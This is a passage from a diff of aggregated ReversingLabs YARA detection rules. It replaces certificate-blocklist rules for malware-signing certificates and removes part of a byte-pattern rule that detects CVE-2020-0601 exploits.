+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11236-L11252"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65"
+		logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29813,21 +52207,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jin Yuguang" and pe.signatures [ i ] . serial == "5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "51e603bb-ef21-55e8-8f2b-94865f1213c9"
+		id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17124-L17140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11254-L11270"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f"
+		logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29837,21 +52231,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RocketMedia S.r.l." and pe.signatures [ i ] . serial == "0a:20:89" and 1050073884 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MANILA Solution as" and pe.signatures [ i ] . serial == "64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084"
+		id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17142-L17158"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11272-L11288"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8"
+		logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29861,21 +52255,21 @@ rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59"
+		id = "03533c22-eb16-546c-af55-675af9c833ce"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17160-L17178"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11290-L11308"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486"
+		logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29885,21 +52279,21 @@ rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hudson LLC" and ( pe.signatures [ i ] . serial == "00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures [ i ] . serial == "88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" ) and 1595376000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and ( pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures [ i ] . serial == "b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" ) and 1590537600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72d36a5f-6599-5456-ac67-0589e37bd035"
+		id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17180-L17198"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11310-L11326"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed"
+		logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29909,21 +52303,21 @@ rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mapping OOO" and ( pe.signatures [ i ] . serial == "00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures [ i ] . serial == "a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "52cdf082-7212-53e6-9e55-b86153e6afe8"
+		id = "d7bf59df-708c-5260-bc98-1a86b2c9c988"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17200-L17216"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11328-L11344"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1"
+		logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29933,21 +52327,21 @@ rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Evetrans Ltd" and pe.signatures [ i ] . serial == "18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "98c19385-555e-5827-b03c-59645ad2a101"
+		id = "3d806d90-e029-5521-b191-6967e2691c0f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17218-L17234"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11346-L11362"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813"
+		logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29957,21 +52351,21 @@ rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "47207784-5aee-5fa3-bed9-2c12d9932c38"
+		id = "1bc9d36c-381e-5359-bba4-8dd870ed9267"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17236-L17252"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11364-L11382"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5"
+		logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29981,21 +52375,21 @@ rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Citizen Travel Ltd" and pe.signatures [ i ] . serial == "57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and ( pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures [ i ] . serial == "8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" ) and 1599177600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e8575a71-124b-5040-91b1-ccad371e10da"
+		id = "d251afda-7582-5a00-a100-fd3acff2f995"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17254-L17270"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11384-L11400"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add"
+		logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -30005,21 +52399,21 @@ rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ENP Games Co., Ltd." and pe.signatures [ i ] . serial == "07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb"
+		id = "e7cdf040-3fe2-55ed-8f66-702fb4455653"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17272-L17288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11402-L11420"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed"
+		logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -30029,30550 +52423,7960 @@ rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) and 1617062400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE
+rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CVE-2020-0601 exploit."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b3978831-57d6-5f25-a271-fa4f449d37b3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11422-L11440"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817"
+		logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "EXPLOIT"
-		exploit = "CVE-2020-0601"
-		tc_detection_type = "Exploit"
-		tc_detection_name = "CVE-2020-0601"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$oid_prime_explicit = {
-            06 07 2A 86 48 CE 3D 01 01
-        }
-		$ecc_public_key_1 = {
-            04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B
-            B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28
-            FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D
-            43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D
-            4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87
-            94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86
-            4A
-        }
-		$ecc_public_key_2 = {
-            04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66
-            02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5
-            9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27
-            A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF
-            6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C
-            55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC
-            20
-        }
-		$ecc_public_key_3 = {
-            04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92
-            3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83
-            89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A
-            3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D
-            01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B
-            D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3
-            F9
-        }
-		$ecc_public_key_4 = {
-            04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D
-            C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB
-            85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6
-            C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3
-            60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4
-            FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C
-            06
-        }
-		$ecc_public_key_5 = {
-            04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6
-            87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59
-            65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62
-            12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8
-            4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F
-            A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8
-            C0
-        }
-		$ecc_public_key_6 = {
-            04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 7C EF D3 CC FA
-            3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92
-            B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F
-            C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A
-            BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09
-            5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B
-            BD
-        }
-		$ecc_public_key_7 = {
-            04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18
-            F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23
-            15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC
-            32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3
-            67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97
-            B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97
-            99
-        }
-		$ecc_public_key_8 = {
-            04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE
-            73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0
-            CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C
-            17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B
-            AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE
-            AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2
-            3E
-        }
-		$ecc_public_key_9 = {
-            04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B
-            2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52
-            C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91
-            E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16
-            DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7
-            C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA
-            B5
-        }
-		$ecc_public_key_10 = {
-            04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF
-            D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F
-            15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C
-            2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28
-            25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD
-            43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD
-            21
-        }
-		$ecc_public_key_11 = {
-            04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4
-            AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24
-            3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB
-            77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4
-            4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B
-            A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06
-            E9
-        }
-		$ecc_public_key_12 = {
-            04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64
-            4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64
-            6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76
-            95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C
-            25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A
-            42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1
-            46
-        }
-		$ecc_public_key_13 = {
